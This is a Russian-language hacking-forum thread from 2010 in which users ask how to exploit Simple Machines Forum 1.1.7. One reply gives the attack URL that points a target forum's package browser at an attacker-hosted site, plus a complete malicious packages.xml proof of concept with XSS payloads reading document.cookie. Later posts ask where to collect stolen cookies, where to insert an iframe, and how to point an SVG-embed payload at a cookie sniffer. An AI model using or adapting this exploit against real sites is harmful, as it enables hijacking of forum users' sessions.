Сплойт под SMF 1.1.7

Discussion in 'Песочница' started by Gos, 9 Jan 2010.

  1. Gos

    Gos New Member

    Joined:
    27 Sep 2007
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Подскажите, как использовать данный эксплойт. Схема действий, хотя бы вкратце..

    http://www.exploit-db.com/exploits/7866

    Я понимаю, что наверняка много подобных тем, но в поиске почти ничего не нашел... Буду очень благодарен.
     
  2. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    http://атакуемыйсайт.com/index.php?action=packageget;sa=browse;absolute=http://твой сайт.com

    а на нем файл packages.xml
    с таким вот содержанием:
    PHP:
    <?xml version="1.0"?>
    <!DOCTYPE modification SYSTEM "http://www.simplemachines.org/xml/package-list">
    <!-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    XSRF SMF PoC By Xianur0
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -->

    <package-list xmlns="http://www.simplemachines.org/xml/package-list"
    xmlns:smf="http://www.simplemachines.org/">
    <list-title>Xianur0 Was Here</list-title>

    <section>
        <title>SMF XSS PoC By Xianur0</title>
        <text><![CDATA[<script>alert('XSS')</script>]]></text>
        <modification>
            <id>Xianur0:XSMF</id>
            <name>SMF PoC By Xianur0</name>
            <filename>smfexploit.zip</filename>
            <version>0.1</version>
            <author email="[email protected]">Xianur0</author>
            <description><![CDATA[<script>alert(document.cookie)</script>]]></description>
        </modification>
    </section>
    </package-list>

    эммм... как бэ вроде так
     
  3. Gos

    Gos New Member

    Joined:
    27 Sep 2007
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    это я и сам прочитал) Интересует схема действий, при использовании. Где потом брать куки? куда вставлять айфрейм?
     
  4. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    можно так...
     
  5. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204

    Это уже к сплоиту не имеет отношения. Читай статьи про XSS.
     
  6. SEKTOR3A

    SEKTOR3A New Member

    Joined:
    2 May 2009
    Messages:
    36
    Likes Received:
    1
    Reputations:
    0
    плиз как использовать данный script ,как сделать ссылку на снифер в данной ситуации,Спасибо.


    <EMBED SRC="data:image/svg+xml;base64,как сделать ссылку на снифер" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
     
    #6 SEKTOR3A, 29 Jan 2010
    Last edited: 29 Jan 2010